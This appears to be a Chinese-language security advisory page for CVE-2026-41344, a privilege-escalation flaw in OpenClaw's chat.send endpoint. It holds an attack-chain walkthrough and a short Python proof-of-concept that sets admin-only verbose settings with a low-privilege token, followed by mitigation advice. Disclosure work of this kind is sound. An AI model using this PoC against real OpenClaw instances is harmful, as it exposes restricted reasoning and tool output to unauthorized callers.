CVE-2026-41344 CVSS 5.4 中危

CVE-2026-41344 OpenClaw权限提升漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41344

漏洞类型

权限提升

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.28之前的版本在chat.send端点存在权限提升漏洞。该问题允许具有写入权限的网关调用者持久化仅限管理员使用的verboseLevel会话配置。攻击者可利用/verbose参数绕过访问控制机制，进而获取管理员级别的敏感推理数据或工具输出信息。

技术细节

该漏洞源于OpenClaw在chat.send端点处理会话参数时的权限校验逻辑缺陷。正常情况下，verboseLevel参数仅允许管理员级别用户配置，用于调试或查看详细的内部推理过程。然而，在受影响版本中，系统未能正确区分普通写入网关调用者与管理员权限。当攻击者构造包含/verbose参数的恶意请求发送至chat.send接口时，系统会错误地接受该参数并将其持久化到当前会话中。这导致后续的会话响应中包含本应受限的敏感系统内部信息（如详细的推理逻辑、工具执行细节等），从而违反了最小权限原则，造成了信息泄露和会话完整性的破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统运行的是OpenClaw 2026.3.28之前的版本，并确认其拥有具有写入权限（write-scoped）的API网关访问令牌。

STEP 2

2. 漏洞利用

攻击者向chat.send端点发送特制的HTTP POST请求，在请求体中注入"verbose": true或"verboseLevel": "admin"参数。

STEP 3

3. 权限提升与数据泄露

服务器接受该参数并将其持久化到会话中，绕过了管理员权限检查。攻击者随后的交互将返回包含敏感内部逻辑和工具输出的详细调试信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-41344
# Target: OpenClaw < 2026.3.28
# This script simulates a low-privileged user sending a request
# to the chat.send endpoint with the /verbose parameter enabled.

target_url = "http://target-openclaw-instance/api/chat.send"
headers = {
    "Content-Type": "application/json",
    # Low-privileged token with write scope
    "Authorization": "Bearer <WRITE_SCOPED_TOKEN>"
}

payload = {
    "message": "Test message",
    # Exploiting the verbose parameter to persist admin-level settings
    "verbose": True,
    "verboseLevel": "admin"
}

try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Request successful. Check response for sensitive reasoning data.")
        print("[+] Response:", response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

如果不能立即升级，建议在网络边界限制对/chat.send端点的非必要访问，并配置WAF规则拦截包含verbose参数的异常请求，直到补丁应用完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表